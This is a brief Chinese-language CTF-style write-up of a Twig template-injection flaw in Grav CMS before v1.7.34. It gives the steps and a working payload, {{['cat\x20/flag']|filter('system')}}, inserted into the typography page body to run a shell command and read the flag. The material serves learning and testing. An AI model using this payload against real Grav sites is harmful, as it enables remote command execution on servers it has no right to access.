漏洞描述:Grav CMS 可以通过 Twig 来进行页面的渲染,使用了不安全的配置可以达到远程代码执行的效果,影响最新版 v1.7.34 以下的版本

随便注册进入后台,在pages/typography下的正文编辑插入payload:{{['cat\x20/flag']|filter('system')}},保存访问/typography,getflag